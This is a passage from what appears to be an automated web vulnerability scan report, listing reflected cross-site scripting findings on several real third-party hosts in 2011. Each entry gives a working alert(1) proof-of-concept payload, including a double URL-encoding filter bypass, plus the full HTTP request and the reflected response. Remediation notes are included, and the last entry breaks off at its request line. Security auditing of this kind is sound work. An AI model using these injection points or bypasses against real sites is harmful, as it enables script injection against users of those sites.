This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099308-330823&mboxCount=3&mbox=SiteCatalyst%3A%20event9f6fa<img%20src%3da%20onerror%3dalert(1)>1c6c15d13c9&mboxId=0&mboxTime=1317584104195&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Mon, 03 Oct 2011 00:37:08 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event9f6fa<img src=a onerror=alert(1)>1c6c15d13c9', 0).setOffer(new mboxOfferDefault()).loaded();}
4.79. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload e05e0<script>alert(1)</script>93f9fb94bab was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099308-330823&mboxCount=3&mbox=SiteCatalyst%3A%20event&mboxId=0e05e0<script>alert(1)</script>93f9fb94bab&mboxTime=1317584104195&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Mon, 03 Oct 2011 00:37:14 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event', 0e05e0<script>alert(1)</script>93f9fb94bab).setOffer(new mboxOfferDefault()).loaded();}
4.80. http://otter.topsy.com/stats.js [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otter.topsy.com
Path:   /stats.js

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4e09d%253cscript%253ealert%25281%2529%253c%252fscript%253e2c4a6fbea89 was submitted in the url parameter. This input was echoed as 4e09d<script>alert(1)</script>2c4a6fbea89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /stats.js?url=http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/4e09d%253cscript%253ealert%25281%2529%253c%252fscript%253e2c4a6fbea89&amp;callback=jQuery1505501451776362956_1317600055917&_=1317600061932 HTTP/1.1
Host: otter.topsy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/json; charset=utf-8
Expires: Mon, 03 Oct 2011 00:02:23 GMT
Last-Modified: Mon, 03 Oct 2011 00:02:18 GMT
Server: lighttpd/1.4.26
Content-Length: 648
Date: Mon, 03 Oct 2011 00:02:18 GMT
X-Varnish: 1815814625
Age: 0
Via: 1.1 varnish
X-Served-By: ps198
X-Cache: MISS
X-RateLimit-Limit: 3000
X-RateLimit-Remaining: 2980
X-RateLimit-Reset: 1317625200
Connection: close

{"request":{"parameters":{"url":"http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/4e09d<script>alert(1)</script>2c4a6fbea89"},"response_type":"json","resource":"stats","url":"http://otter.topsy.com/stats.json?url=http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F23%2Fhublot-watchesa-look-at-the-king-power-dwayne-wade%2F4e09d%3Cs
...[SNIP]...
4.81. https://secure.mlb.com/style/nav_2011.jsp [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 7050a<script>alert(1)</script>7aa54aad239 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule7050a<script>alert(1)</script>7aa54aad239 HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:49:09 GMT
Expires: Mon, 03 Oct 2011 01:49:09 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 17041


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
bottom, color-stop(0%,), color-stop(57%,)); /* webkit */filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='', endColorstr='',GradientType=0 ); /* ie */}

#value-menu li#header_schedule7050a<script>alert(1)</script>7aa54aad239 a, .dd_navigation li.first:hover, .dd_navigation li.first a:hover, .dd_navigation li.first.vmHover a, .dd_navigation li.first:hover a, .dd_navigation li.first a:focus, .dd_navigation a:active {color:;
...[SNIP]...
4.82. http://servedby.flashtalking.com/imp/1/16628 [183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the 183799;201;js;BarclaysPremierLeague;RONMPU/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b49"-alert(1)-"89d3efd3f60 was submitted in the 183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=21b49"-alert(1)-"89d3efd3f60&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:55:55 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 02 Oct 2011 23:55:55 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 587


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=21b49"-alert(1)-"89d3efd3f60&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src=
...[SNIP]...
4.83. http://servedby.flashtalking.com/imp/1/16628 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63a0b"-alert(1)-"b1662c828f2 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.048300936863a0b"-alert(1)-"b1662c828f2 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:27 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:27 GMT
Cache-Control: no-cache, no-store
Content-Length: 587
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 sjc005204 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.048300936863a0b"-alert(1)-"b1662c828f2";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/18/183799/231524/js/j
...[SNIP]...
4.84. http://servedby.flashtalking.com/imp/1/16628 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0aa0"-alert(1)-"1be41f544a2 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=a0aa0"-alert(1)-"1be41f544a2&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:15 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:15 GMT
Cache-Control: no-cache, no-store
Content-Length: 587
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005204 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=a0aa0"-alert(1)-"1be41f544a2&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flash
...[SNIP]...
4.85. http://servedby.flashtalking.com/imp/1/16628 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d94e"-alert(1)-"28a61fe6ab9 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=3d94e"-alert(1)-"28a61fe6ab9&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:21 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:21 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 587
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005204 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=3d94e"-alert(1)-"28a61fe6ab9&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking
...[SNIP]...
4.86. http://servedby.flashtalking.com/imp/1/16628 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 840ca"-alert(1)-"66aa2a01380 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=840ca"-alert(1)-"66aa2a01380&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:02 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 587
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005202 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=840ca"-alert(1)-"66aa2a01380&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http
...[SNIP]...
4.87. http://servedby.flashtalking.com/imp/1/16628 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c09f"-alert(1)-"66ba1909e6e was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=4c09f"-alert(1)-"66ba1909e6e&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:08 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:08 GMT
Cache-Control: no-cache, no-store
Content-Length: 587
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 sjc005203 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=4c09f"-alert(1)-"66ba1909e6e&ftadz=&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...
4.88. http://servedby.flashtalking.com/imp/1/16628 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3805"-alert(1)-"6ebdb2ef636 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368&b3805"-alert(1)-"6ebdb2ef636=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:37 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=13704C17CA7D33|f20004352=(s:2-t:13702356)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:37 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 590
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005202 (MII-APC/2.1)


var ftGUID_183799="13704C17CA7D33";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368&b3805"-alert(1)-"6ebdb2ef636=1";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/18/183799/231524/js
...[SNIP]...
4.89. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c87d8'-alert(1)-'4a69ed925e5 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

